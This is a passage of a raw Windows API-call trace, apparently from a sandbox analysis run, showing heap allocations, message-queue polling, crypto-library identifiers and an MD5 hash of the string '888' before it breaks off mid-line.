[0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0156.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0156.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0156.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0156.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0156.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0156.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0156.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0156.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0156.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0156.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0156.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0156.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0156.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0156.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0156.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0156.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0156.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0156.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0156.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0156.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0156.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0156.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0156.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0156.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0156.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0156.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0156.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0156.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0156.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0156.403] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0156.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.404] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.404] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0156.404] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.404] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0156.404] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.404] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.404] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.404] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0156.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0156.404] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0156.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.405] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.405] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0156.405] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0156.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0156.406] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0156.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0156.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0156.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0156.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0156.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0156.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0156.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0156.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0156.407] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0156.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0156.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54eb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0156.407] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0156.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0156.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0156.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0156.408] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.408] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0156.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50bd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0156.408] CryptHashData (hHash=0xa87250, pbData=0x2e54dc8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0156.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0156.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0156.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0156.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0156.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0156.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0156.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0156.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 